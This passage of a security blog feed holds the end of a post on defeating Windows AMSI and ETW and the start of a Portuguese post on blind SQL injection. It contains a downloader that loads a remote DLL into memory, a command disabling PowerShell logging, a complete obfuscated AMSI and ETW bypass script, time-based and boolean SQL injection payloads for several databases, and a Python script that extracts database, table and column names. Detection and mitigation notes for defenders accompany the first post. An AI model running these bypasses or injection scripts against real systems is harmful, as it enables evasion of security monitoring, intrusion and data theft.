style="color:#ABB2BF">IEX </span><span style="color:#E06C75">$r.Content</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># .NET assembly in memory</span></span> <span class="line"><span style="color:#E06C75">$bytes</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> (</span><span style="color:#56B6C2">New-Object</span><span style="color:#ABB2BF"> Net.WebClient).DownloadData(&#x26;</span><span style="color:#7F848E;font-style:italic">#x27;http://192.168.1.10/tool.dll&#x26;#x27;)</span></span> <span class="line"><span style="color:#ABB2BF">[</span><span style="color:#C678DD">Reflection.Assembly</span><span style="color:#ABB2BF">]::Load(</span><span style="color:#E06C75">$bytes</span><span style="color:#ABB2BF">)</span></span></code></pre> <h2 id="edr-detection-and-workarounds">EDR Detection and Workarounds</h2> <p>Modern EDRs monitor beyond AMSI:</p> <table><thead><tr><th>Detection Vector</th><th>Evasion Technique</th></tr></thead><tbody><tr><td>String Signatures</td><td>Obfuscation, encoding, concatenation</td></tr><tr><td>Script Block Logging</td><td>Patch <code>ScriptBlockLoggingEnabled</code> via registry</td></tr><tr><td>ETW (Event Tracing)</td><td>Patch <code>EtwEventWrite</code> in <code>ntdll.dll</code></td></tr><tr><td>Constrained Language Mode</td><td>Bypass via COM, <code>Add-Type</code>, runspaces</td></tr><tr><td>WLDP (WDAC)</td><td>More advanced process injection techniques</td></tr></tbody></table> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="powershell"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Disable Script Block Logging (requires permission or CLM bypass)</span></span> <span class="line"><span style="color:#E06C75">$key</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#7F848E;font-style:italic">#x27;HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging&#x26;#x27;</span></span> <span class="line"><span style="color:#56B6C2">Set-ItemProperty</span><span style="color:#56B6C2"> -</span><span style="color:#ABB2BF">Path </span><span style="color:#E06C75">$key</span><span style="color:#56B6C2"> -</span><span style="color:#ABB2BF">Name &#x26;</span><span style="color:#7F848E;font-style:italic">#x27;EnableScriptBlockLogging&#x26;#x27; -Value 0</span></span></code></pre> <h2 id="complete-script-amsi--etw-bypass">Complete Script: AMSI + ETW Bypass</h2> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="powershell"><code><span class="line"><span style="color:#7F848E;font-style:italic">#!/usr/bin/env pwsh</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># amsi_etw_bypass.ps1 — AMSI + ETW neutralization</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Usage: . .\amsi_etw_bypass.ps1</span></span> <span class="line"></span> <span class="line"><span style="color:#C678DD">function</span><span style="color:#61AFEF"> Invoke-AmsiBypass</span><span style="color:#ABB2BF"> {</span></span> <span class="line"><span style="color:#C678DD"> try</span><span style="color:#ABB2BF"> {</span></span> <span class="line"><span style="color:#E06C75"> $a</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> [</span><span style="color:#C678DD">Ref</span><span style="color:#ABB2BF">].Assembly.GetType(</span></span> <span class="line"><span style="color:#ABB2BF"> &#x26;</span><span style="color:#7F848E;font-style:italic">#x27;System.Management.Automation.&#x26;#x27; + &#x26;#x27;Am&#x26;#x27; + &#x26;#x27;siUtils&#x26;#x27;</span></span> <span class="line"><span style="color:#ABB2BF"> )</span></span> <span class="line"><span style="color:#E06C75"> $b</span><span style="color:#56B6C2"> =</span><span style="color:#E06C75"> $a.GetField</span><span style="color:#ABB2BF">(&#x26;</span><span style="color:#7F848E;font-style:italic">#x27;am&#x26;#x27; + &#x26;#x27;siInit&#x26;#x27; + &#x26;#x27;Failed&#x26;#x27;, &#x26;#x27;NonPublic,Static&#x26;#x27;)</span></span> <span class="line"><span style="color:#E06C75"> $b.SetValue</span><span style="color:#ABB2BF">(</span><span style="color:#D19A66">$null</span><span style="color:#ABB2BF">, </span><span style="color:#D19A66">$true</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#56B6C2"> Write-Host</span><span style="color:#ABB2BF"> &#x26;quot;[</span><span style="color:#56B6C2">+</span><span style="color:#ABB2BF">] AMSI : disabled&#x26;quot; </span><span style="color:#56B6C2">-</span><span style="color:#ABB2BF">ForegroundColor Green</span></span> <span class="line"><span style="color:#ABB2BF"> } </span><span style="color:#C678DD">catch</span><span style="color:#ABB2BF"> {</span></span> <span class="line"><span style="color:#56B6C2"> Write-Host</span><span style="color:#ABB2BF"> &#x26;quot;[</span><span style="color:#56B6C2">-</span><span style="color:#ABB2BF">] AMSI bypass failed: $_&#x26;quot; </span><span style="color:#56B6C2">-</span><span style="color:#ABB2BF">ForegroundColor Red</span></span> <span class="line"><span style="color:#ABB2BF"> }</span></span> <span class="line"><span style="color:#ABB2BF">}</span></span> <span class="line"></span> <span class="line"><span style="color:#C678DD">function</span><span style="color:#61AFEF"> Invoke-ETWBypass</span><span style="color:#ABB2BF"> {</span></span> <span class="line"><span style="color:#C678DD"> try</span><span style="color:#ABB2BF"> {</span></span> <span class="line"><span style="color:#E06C75"> $patch</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> [</span><span style="color:#C678DD">Byte</span><span style="color:#ABB2BF">[]](</span><span style="color:#D19A66">0xC3</span><span style="color:#ABB2BF">) </span><span style="color:#7F848E;font-style:italic"># ret</span></span> <span class="line"><span style="color:#E06C75"> $addr</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> [</span><span style="color:#C678DD">System.Diagnostics.Eventing.EventProvider</span><span style="color:#ABB2BF">].GetField(</span></span> <span class="line"><span style="color:#ABB2BF"> &#x26;</span><span style="color:#7F848E;font-style:italic">#x27;m_etwCallback&#x26;#x27;,</span></span> <span class="line"><span style="color:#ABB2BF"> &#x26;</span><span style="color:#7F848E;font-style:italic">#x27;NonPublic,Instance&#x26;#x27;</span></span> <span class="line"><span style="color:#ABB2BF"> )</span></span> <span class="line"><span style="color:#ABB2BF"> </span></span> <span class="line"><span style="color:#7F848E;font-style:italic"> # P/Invoke to VirtualProtect + patch EtwEventWrite</span></span> <span class="line"><span style="color:#E06C75"> $ntdll</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> [</span><span style="color:#C678DD">System.Runtime.InteropServices.Marshal</span><span style="color:#ABB2BF">]</span></span> <span class="line"><span style="color:#E06C75"> $kernel32</span><span style="color:#56B6C2"> =</span><span style="color:#56B6C2"> Add-Type</span><span style="color:#56B6C2"> -</span><span style="color:#ABB2BF">MemberDefinition @&#x26;</span><span style="color:#7F848E;font-style:italic">#x27;</span></span> <span class="line"><span style="color:#ABB2BF">[</span><span style="color:#C678DD">DllImport</span><span style="color:#ABB2BF">(&#x26;quot;kernel32.dll&#x26;quot;)]</span></span> <span class="line"><span style="color:#ABB2BF">public </span><span style="color:#C678DD">static</span><span style="color:#ABB2BF"> extern bool VirtualProtect(</span></span> <span class="line"><span style="color:#ABB2BF"> IntPtr lpAddress, UIntPtr dwSize,</span></span> <span class="line"><span style="color:#ABB2BF"> uint flNewProtect, out uint lpflOldProtect);</span></span> <span class="line"><span style="color:#ABB2BF">[</span><span style="color:#C678DD">DllImport</span><span style="color:#ABB2BF">(&#x26;quot;kernel32.dll&#x26;quot;)]</span></span> <span class="line"><span style="color:#ABB2BF">public </span><span style="color:#C678DD">static</span><span style="color:#ABB2BF"> extern IntPtr GetProcAddress(IntPtr h, string name);</span></span> <span class="line"><span style="color:#ABB2BF">[</span><span style="color:#C678DD">DllImport</span><span style="color:#ABB2BF">(&#x26;quot;kernel32.dll&#x26;quot;)]</span></span> <span class="line"><span style="color:#ABB2BF">public </span><span style="color:#C678DD">static</span><span style="color:#ABB2BF"> extern IntPtr LoadLibrary(string name);</span></span> <span class="line"><span style="color:#ABB2BF">&#x26;</span><span style="color:#7F848E;font-style:italic">#x27;@ -Name &#x26;#x27;K32&#x26;#x27; -PassThru</span></span> <span class="line"></span> <span class="line"><span style="color:#E06C75"> $lib</span><span style="color:#56B6C2"> =</span><span style="color:#E06C75"> $kernel32</span><span style="color:#ABB2BF">::LoadLibrary(&#x26;quot;ntdll.dll&#x26;quot;)</span></span> <span class="line"><span style="color:#E06C75"> $func</span><span style="color:#56B6C2"> =</span><span style="color:#E06C75"> $kernel32</span><span style="color:#ABB2BF">::GetProcAddress(</span><span style="color:#E06C75">$lib</span><span style="color:#ABB2BF">, &#x26;quot;EtwEventWrite&#x26;quot;)</span></span> <span class="line"><span style="color:#E06C75"> $old</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> [</span><span style="color:#C678DD">uint32</span><span style="color:#ABB2BF">]</span><span style="color:#D19A66">0</span></span> <span class="line"><span style="color:#E06C75"> $kernel32</span><span style="color:#ABB2BF">::VirtualProtect(</span><span style="color:#E06C75">$func</span><span style="color:#ABB2BF">, [</span><span style="color:#C678DD">UIntPtr</span><span style="color:#ABB2BF">]</span><span style="color:#D19A66">1</span><span style="color:#ABB2BF">, </span><span style="color:#D19A66">0x40</span><span style="color:#ABB2BF">, [</span><span style="color:#C678DD">ref</span><span style="color:#ABB2BF">]</span><span style="color:#E06C75">$old</span><span style="color:#ABB2BF">) | </span><span style="color:#56B6C2">Out-Null</span></span> <span class="line"><span style="color:#ABB2BF"> [</span><span style="color:#C678DD">System.Runtime.InteropServices.Marshal</span><span style="color:#ABB2BF">]::WriteByte(</span><span style="color:#E06C75">$func</span><span style="color:#ABB2BF">, </span><span style="color:#D19A66">0xC3</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#ABB2BF"> </span></span> <span class="line"><span style="color:#56B6C2"> Write-Host</span><span style="color:#ABB2BF"> &#x26;quot;[</span><span style="color:#56B6C2">+</span><span style="color:#ABB2BF">] ETW : patched&#x26;quot; </span><span style="color:#56B6C2">-</span><span style="color:#ABB2BF">ForegroundColor Green</span></span> <span class="line"><span style="color:#ABB2BF"> } </span><span style="color:#C678DD">catch</span><span style="color:#ABB2BF"> {</span></span> <span class="line"><span style="color:#56B6C2"> Write-Host</span><span style="color:#ABB2BF"> &#x26;quot;[!] ETW bypass skipped: $_&#x26;quot; </span><span style="color:#56B6C2">-</span><span style="color:#ABB2BF">ForegroundColor Yellow</span></span> <span class="line"><span style="color:#ABB2BF"> }</span></span> <span class="line"><span style="color:#ABB2BF">}</span></span> <span class="line"></span> <span class="line"><span style="color:#56B6C2">Invoke-AmsiBypass</span></span> <span class="line"><span style="color:#56B6C2">Invoke-ETWBypass</span></span> <span class="line"><span style="color:#56B6C2">Write-Host</span><span style="color:#ABB2BF"> &#x26;quot;[</span><span style="color:#56B6C2">*</span><span style="color:#ABB2BF">] Session ready. OPSEC level: reduced.&#x26;quot; </span><span style="color:#56B6C2">-</span><span style="color:#ABB2BF">ForegroundColor Cyan</span></span></code></pre> <h2 id="detection-by-the-defender-side">Detection by the Defender Side</h2> <p>If you are the Blue Team, monitor:</p> <ul> <li><strong>Event ID 4104</strong> — Script Block Logging (PowerShell)</li> <li><strong>Event ID 4688</strong> — Process creation with <code>powershell.exe -version 2</code></li> <li><strong>Sysmon Event 10</strong> — Process access to <code>amsi.dll</code></li> <li>Loading of <code>System.Management.Automation</code> via Reflection</li> <li>Presence of strings such as <code>AmsiScanBuffer</code>, <code>amsiInitFailed</code>, <code>VirtualProtect</code> in logs</li> </ul> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="powershell"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Blue Team: check if AMSI is active in the session</span></span> <span class="line"><span style="color:#ABB2BF">[</span><span style="color:#C678DD">Ref</span><span style="color:#ABB2BF">].Assembly.GetType(&#x26;</span><span style="color:#7F848E;font-style:italic">#x27;System.Management.Automation.AmsiUtils&#x26;#x27;)</span></span> <span class="line"><span style="color:#ABB2BF"> .GetField(&#x26;</span><span style="color:#7F848E;font-style:italic">#x27;amsiInitFailed&#x26;#x27;,&#x26;#x27;NonPublic,Static&#x26;#x27;)</span></span> <span class="line"><span style="color:#ABB2BF"> .GetValue(</span><span style="color:#D19A66">$null</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># $false = AMSI active | $true = AMSI compromised</span></span></code></pre> <h2 id="mitigations">Mitigations</h2> <ul> <li>Enable <strong>PowerShell Constrained Language Mode</strong> via WDAC/AppLocker</li> <li>Disable <strong>PowerShell 2.0</strong> (<code>Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root</code>)</li> <li>Enable <strong>Script Block Logging</strong> and <strong>Module Logging</strong> (GPO)</li> <li>Use <strong>EDR with memory protection</strong> (CrowdStrike, SentinelOne, Microsoft Defender for Endpoint)</li> <li>Monitor <strong>ETW providers</strong> for PowerShell: <code>Microsoft-Windows-PowerShell</code></li> <li>Implement <strong>JEA (Just Enough Administration)</strong> to restrict available commands</li> </ul> <h2 id="references">References</h2> <ul> <li><a href="https://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal">AMSI — Microsoft Docs</a></li> <li><a href="https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell">S3cur3Th1sSh1t/Amsi-Bypass-Powershell</a></li> <li>MITRE ATT&#x26;CK;: <a href="https://attack.mitre.org/techniques/T1562/001/">T1562.001 — Impair Defenses: Disable or Modify Tools</a></li> </ul>redteam@kbmsecurity.com.brevasionamsipowershellevasionwindowsav-bypassreflectionpatchinghardBlind SQL Injection — Extraindo dados sem ver o outputhttps://www.kbmsecurity.com.br/blog/post/sql-injection-blind/https://www.kbmsecurity.com.br/blog/post/sql-injection-blind/Técnicas de exploração de Blind SQL Injection (boolean-based e time-based) para extração de dados quando a aplicação não retorna erros visíveis.Mon, 10 Feb 2025 00:00:00 GMT<h2 id="o-que-é-blind-sql-injection">O que é Blind SQL Injection?</h2> <p><strong>Blind SQL Injection</strong> ocorre quando uma aplicação é vulnerável a SQL Injection, mas <strong>não retorna os resultados da query</strong> nem mensagens de erro na resposta HTTP. O atacante precisa inferir o conteúdo do banco de dados com base em comportamentos indiretos da aplicação.</p> <p>Existem dois tipos principais:</p> <table><thead><tr><th>Tipo</th><th>Mecanismo</th><th>Velocidade</th></tr></thead><tbody><tr><td>Boolean-based</td><td>Avalia TRUE/FALSE na resposta</td><td>Lenta</td></tr><tr><td>Time-based</td><td>Mede atraso na resposta (SLEEP)</td><td>Muito lenta</td></tr><tr><td>Error-based</td><td>Provoca erros com dados embutidos</td><td>Rápida</td></tr><tr><td>Out-of-band</td><td>Exfiltração via DNS/HTTP</td><td>Rápida</td></tr></tbody></table> <hr> <h2 id="identificando-a-vulnerabilidade">Identificando a vulnerabilidade</h2> <h3 id="teste-básico-de-injeção">Teste básico de injeção</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="http"><code><span class="line"><span style="color:#C678DD">GET</span><span style="color:#ABB2BF"> /user?id=1 </span><span style="color:#C678DD">HTTP</span><span style="color:#ABB2BF">/</span><span style="color:#D19A66">1.1</span></span> <span class="line"><span style="color:#E06C75">Host</span><span style="color:#C678DD">:</span><span style="color:#98C379"> target.com</span></span></code></pre> <p>Injete condições booleanas e observe diferenças de resposta:</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="plaintext"><code><span class="line"><span># Condição TRUE — resposta normal</span></span> <span class="line"><span>/user?id=1 AND 1=1--</span></span> <span class="line"><span></span></span> <span class="line"><span># Condição FALSE — resposta diferente (sem conteúdo, redirect, etc.)</span></span> <span class="line"><span>/user?id=1 AND 1=2--</span></span></code></pre> <p>Se as respostas forem <strong>visivelmente diferentes</strong> entre TRUE e FALSE, o endpoint é vulnerável a boolean-based blind SQLi.</p> <h3 id="teste-time-based">Teste time-based</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="plaintext"><code><span class="line"><span># MySQL / MariaDB</span></span> <span class="line"><span>/user?id=1 AND SLEEP(5)--</span></span> <span class="line"><span></span></span> <span class="line"><span># PostgreSQL</span></span> <span class="line"><span>/user?id=1 AND pg_sleep(5)--</span></span> <span class="line"><span></span></span> <span class="line"><span># MSSQL</span></span> <span class="line"><span>/user?id=1; WAITFOR DELAY '0:0:5'--</span></span> <span class="line"><span></span></span> <span class="line"><span># Oracle</span></span> <span class="line"><span>/user?id=1 AND 1=DBMS_PIPE.RECEIVE_MESSAGE('a',5)--</span></span></code></pre> <p>Se a resposta demorar exatamente <strong>5 segundos</strong>, o backend é vulnerável.</p> <hr> <h2 id="boolean-based-exploitation-manual">Boolean-Based Exploitation (Manual)</h2> <p>A técnica consiste em fazer perguntas de <strong>sim/não</strong> ao banco de dados, extraindo um caractere por vez.</p> <h3 id="identificando-o-banco-de-dados">Identificando o banco de dados</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="sql"><code><span class="line"><span style="color:#7F848E;font-style:italic">-- MySQL</span></span> <span class="line"><span style="color:#D19A66">1</span><span style="color:#C678DD"> AND</span><span style="color:#56B6C2"> SUBSTRING</span><span style="color:#ABB2BF">(@@</span><span style="color:#C678DD">version</span><span style="color:#ABB2BF">,</span><span style="color:#D19A66">1</span><span style="color:#ABB2BF">,</span><span style="color:#D19A66">1</span><span style="color:#ABB2BF">)</span><span style="color:#56B6C2">=</span><span style="color:#98C379">'5'</span><span style="color:#7F848E;font-style:italic">--</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic">-- PostgreSQL</span></span> <span class="line"><span style="color:#D19A66">1</span><span style="color:#C678DD"> AND</span><span style="color:#56B6C2"> SUBSTRING</span><span style="color:#ABB2BF">(</span><span style="color:#C678DD">version</span><span style="color:#ABB2BF">(),</span><span style="color:#D19A66">1</span><span style="color:#ABB2BF">,</span><span style="color:#D19A66">10</span><span style="color:#ABB2BF">)</span><span style="color:#56B6C2">=</span><span style="color:#98C379">'PostgreSQL'</span><span style="color:#7F848E;font-style:italic">--</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic">-- MSSQL</span></span> <span class="line"><span style="color:#D19A66">1</span><span style="color:#C678DD"> AND</span><span style="color:#56B6C2"> SUBSTRING</span><span style="color:#ABB2BF">(@@</span><span style="color:#C678DD">version</span><span style="color:#ABB2BF">,</span><span style="color:#D19A66">1</span><span style="color:#ABB2BF">,</span><span style="color:#D19A66">9</span><span style="color:#ABB2BF">)</span><span style="color:#56B6C2">=</span><span style="color:#98C379">'Microsoft'</span><span style="color:#7F848E;font-style:italic">--</span></span></code></pre> <h3 id="extraindo-o-nome-do-banco-atual">Extraindo o nome do banco atual</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="sql"><code><span class="line"><span style="color:#7F848E;font-style:italic">-- Tamanho do nome</span></span> <span class="line"><span style="color:#D19A66">1</span><span style="color:#C678DD"> AND</span><span style="color:#C678DD"> LENGTH</span><span style="color:#ABB2BF">(</span><span style="color:#C678DD">database</span><span style="color:#ABB2BF">())</span><span style="color:#56B6C2">=</span><span style="color:#D19A66">6</span><span style="color:#7F848E;font-style:italic">--</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic">-- Primeiro caractere</span></span> <span class="line"><span style="color:#D19A66">1</span><span style="color:#C678DD"> AND</span><span style="color:#56B6C2"> SUBSTRING</span><span style="color:#ABB2BF">(</span><span style="color:#C678DD">database</span><span style="color:#ABB2BF">(),</span><span style="color:#D19A66">1</span><span style="color:#ABB2BF">,</span><span style="color:#D19A66">1</span><span style="color:#ABB2BF">)</span><span style="color:#56B6C2">=</span><span style="color:#98C379">'d'</span><span style="color:#7F848E;font-style:italic">--</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic">-- Segundo caractere</span></span> <span class="line"><span style="color:#D19A66">1</span><span style="color:#C678DD"> AND</span><span style="color:#56B6C2"> SUBSTRING</span><span style="color:#ABB2BF">(</span><span style="color:#C678DD">database</span><span style="color:#ABB2BF">(),</span><span style="color:#D19A66">2</span><span style="color:#ABB2BF">,</span><span style="color:#D19A66">1</span><span style="color:#ABB2BF">)</span><span style="color:#56B6C2">=</span><span style="color:#98C379">'v'</span><span style="color:#7F848E;font-style:italic">--</span></span></code></pre> <h3 id="script-python-para-automação-boolean-based">Script Python para automação boolean-based</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="python"><code><span class="line"><span style="color:#7F848E;font-style:italic">#!/usr/bin/env python3</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># blind_sqli_extract.py — Boolean-based extractor</span></span> <span class="line"></span> <span class="line"><span style="color:#C678DD">import</span><span style="color:#ABB2BF"> requests</span></span> <span class="line"><span style="color:#C678DD">import</span><span style="color:#ABB2BF"> string</span></span> <span class="line"><span style="color:#C678DD">import</span><span style="color:#ABB2BF"> sys</span></span> <span class="line"></span> <span class="line"><span style="color:#D19A66">TARGET</span><span style="color:#56B6C2"> =</span><span style="color:#98C379"> "http://target.com/user"</span></span> <span class="line"><span style="color:#D19A66">PARAM</span><span style="color:#56B6C2"> =</span><span style="color:#98C379"> "id"</span></span> <span class="line"><span style="color:#D19A66">CHARS</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> string.ascii_lowercase </span><span style="color:#56B6C2">+</span><span style="color:#ABB2BF"> string.digits </span><span style="color:#56B6C2">+</span><span style="color:#98C379"> "_-@."</span></span> <span class="line"></span> <span class="line"><span style="color:#C678DD">def</span><span style="color:#61AFEF"> inject</span><span style="color:#ABB2BF">(</span><span style="color:#D19A66;font-style:italic">payload</span><span style="color:#ABB2BF">: </span><span style="color:#56B6C2">str</span><span style="color:#ABB2BF">) -> </span><span style="color:#56B6C2">bool</span><span style="color:#ABB2BF">:</span></span> <span class="line"><span style="color:#98C379"> """Returns True if the injection condition is TRUE."""</span></span> <span class="line"><span style="color:#ABB2BF"> params </span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF"> {</span><span style="color:#D19A66">PARAM</span><span style="color:#ABB2BF">: </span><span style="color:#C678DD">f</span><span style="color:#98C379">"1 AND (</span><span style="color:#D19A66">{</span><span style="color:#ABB2BF">payload</span><span style="color:#D19A66">}</span><span style="color:#98C379">)-- -"</span><span style="color:#ABB2BF">}</span></span> <span class="line"><span style="color:#ABB2BF"> r </span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF"> requests.</span><span style="color:#61AFEF">get</span><span style="color:#ABB2BF">(</span><span style="color:#D19A66">TARGET</span><span style="color:#ABB2BF">, </span><span style="color:#E06C75;font-style:italic">params</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">params, </span><span style="color:#E06C75;font-style:italic">timeout</span><span style="color:#56B6C2">=</span><span style="color:#D19A66">10</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"> # Adjust the marker to whatever differentiates TRUE from FALSE</span></span> <span class="line"><span style="color:#C678DD"> return</span><span style="color:#98C379"> "Welcome"</span><span style="color:#C678DD"> in</span><span style="color:#ABB2BF"> r.text</span></span> <span class="line"></span> <span class="line"><span style="color:#C678DD">def</span><span style="color:#61AFEF"> extract_string</span><span style="color:#ABB2BF">(</span><span style="color:#D19A66;font-style:italic">query</span><span style="color:#ABB2BF">: </span><span style="color:#56B6C2">str</span><span style="color:#ABB2BF">, </span><span style="color:#D19A66;font-style:italic">max_len</span><span style="color:#ABB2BF">: </span><span style="color:#56B6C2">int</span><span style="color:#56B6C2"> =</span><span style="color:#D19A66"> 64</span><span style="color:#ABB2BF">) -> </span><span style="color:#56B6C2">str</span><span style="color:#ABB2BF">:</span></span> <span class="line"><span style="color:#98C379"> """Extract a string value one character at a time."""</span></span> <span class="line"><span style="color:#ABB2BF"> result </span><span style="color:#56B6C2">=</span><span style="color:#98C379"> ""</span></span> <span class="line"><span style="color:#C678DD"> for</span><span style="color:#ABB2BF"> pos </span><span style="color:#C678DD">in</span><span style="color:#56B6C2"> range</span><span style="color:#ABB2BF">(</span><span style="color:#D19A66">1</span><span style="color:#ABB2BF">, max_len </span><span style="color:#56B6C2">+</span><span style="color:#D19A66"> 1</span><span style="color:#ABB2BF">):</span></span> <span class="line"><span style="color:#ABB2BF"> found </span><span style="color:#56B6C2">=</span><span style="color:#D19A66"> False</span></span> <span class="line"><span style="color:#C678DD"> for</span><span style="color:#ABB2BF"> ch </span><span style="color:#C678DD">in</span><span style="color:#D19A66"> CHARS</span><span style="color:#ABB2BF">:</span></span> <span class="line"><span style="color:#ABB2BF"> payload </span><span style="color:#56B6C2">=</span><span style="color:#C678DD"> f</span><span style="color:#98C379">"SUBSTRING((</span><span style="color:#D19A66">{</span><span style="color:#ABB2BF">query</span><span style="color:#D19A66">}</span><span style="color:#98C379">),</span><span style="color:#D19A66">{</span><span style="color:#ABB2BF">pos</span><span style="color:#D19A66">}</span><span style="color:#98C379">,1)='</span><span style="color:#D19A66">{</span><span style="color:#ABB2BF">ch</span><span style="color:#D19A66">}</span><span style="color:#98C379">'"</span></span> <span class="line"><span style="color:#C678DD"> if</span><span style="color:#61AFEF"> inject</span><span style="color:#ABB2BF">(payload):</span></span> <span class="line"><span style="color:#ABB2BF"> result </span><span style="color:#56B6C2">+=</span><span style="color:#ABB2BF"> ch</span></span> <span class="line"><span style="color:#ABB2BF"> sys.stdout.</span><span style="color:#61AFEF">write</span><span style="color:#ABB2BF">(ch)</span></span> <span class="line"><span style="color:#ABB2BF"> sys.stdout.</span><span style="color:#61AFEF">flush</span><span style="color:#ABB2BF">()</span></span> <span class="line"><span style="color:#ABB2BF"> found </span><span style="color:#56B6C2">=</span><span style="color:#D19A66"> True</span></span> <span class="line"><span style="color:#C678DD"> break</span></span> <span class="line"><span style="color:#C678DD"> if</span><span style="color:#C678DD"> not</span><span style="color:#ABB2BF"> found:</span></span> <span class="line"><span style="color:#C678DD"> break</span><span style="color:#7F848E;font-style:italic"> # End of string</span></span> <span class="line"><span style="color:#56B6C2"> print</span><span style="color:#ABB2BF">()</span></span> <span class="line"><span style="color:#C678DD"> return</span><span style="color:#ABB2BF"> result</span></span> <span class="line"></span> <span class="line"><span style="color:#C678DD">if</span><span style="color:#E06C75"> __name__</span><span style="color:#56B6C2"> ==</span><span style="color:#98C379"> "__main__"</span><span style="color:#ABB2BF">:</span></span> <span class="line"><span style="color:#56B6C2"> print</span><span style="color:#ABB2BF">(</span><span style="color:#98C379">"[*] Extracting database name..."</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#ABB2BF"> db </span><span style="color:#56B6C2">=</span><span style="color:#61AFEF"> extract_string</span><span style="color:#ABB2BF">(</span><span style="color:#98C379">"SELECT database()"</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#56B6C2"> print</span><span style="color:#ABB2BF">(</span><span style="color:#C678DD">f</span><span style="color:#98C379">"[+] Database: </span><span style="color:#D19A66">{</span><span style="color:#ABB2BF">db</span><span style="color:#D19A66">}</span><span style="color:#98C379">"</span><span style="color:#ABB2BF">)</span></span> <span class="line"></span> <span class="line"><span style="color:#56B6C2"> print</span><span style="color:#ABB2BF">(</span><span style="color:#98C379">"[*] Extracting first table name..."</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#ABB2BF"> table </span><span style="color:#56B6C2">=</span><span style="color:#61AFEF"> extract_string</span><span style="color:#ABB2BF">(</span></span> <span class="line"><span style="color:#C678DD"> f</span><span style="color:#98C379">"SELECT table_name FROM information_schema.tables "</span></span> <span class="line"><span style="color:#C678DD"> f</span><span style="color:#98C379">"WHERE table_schema='</span><span style="color:#D19A66">{</span><span style="color:#ABB2BF">db</span><span style="color:#D19A66">}</span><span style="color:#98C379">' LIMIT 1"</span></span> <span class="line"><span style="color:#ABB2BF"> )</span></span> <span class="line"><span style="color:#56B6C2"> print</span><span style="color:#ABB2BF">(</span><span style="color:#C678DD">f</span><span style="color:#98C379">"[+] First table: </span><span style="color:#D19A66">{</span><span style="color:#ABB2BF">table</span><span style="color:#D19A66">}</span><span style="color:#98C379">"</span><span style="color:#ABB2BF">)</span></span> <span class="line"></span> <span class="line"><span style="color:#56B6C2"> print</span><span style="color:#ABB2BF">(</span><span style="color:#98C379">"[*] Extracting columns..."</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#ABB2BF"> cols </span><span style="color:#56B6C2">=</span><span style="color:#61AFEF"> extract_string</span><span style="color:#ABB2BF">(</span></span> <span class="line"><span style="color:#C678DD"> f</span><span style="color:#98C379">"SELECT GROUP_CONCAT(column_name) FROM information_schema.columns "</span></span> <span class="line"><span style="color:#C678DD"> f</span><span style="color:#98C379">"WHERE table_name='</span><span style="color:#D19A66">{</span><span style="color:#ABB2BF">table</span><span style="color:#D19A66">}</span><span style="color:#98C379">'"</span></span> <span class="line"><span style="color:#ABB2BF"> )</span></span> <span class="line"><span style="color:#56B6C2"> print</span><span style="color:#ABB2BF">(</span><span style="color:#C678DD">f</span><span style="color:#98C379">"[+] Columns: </span><span style="color:#D19A66">{</span><span 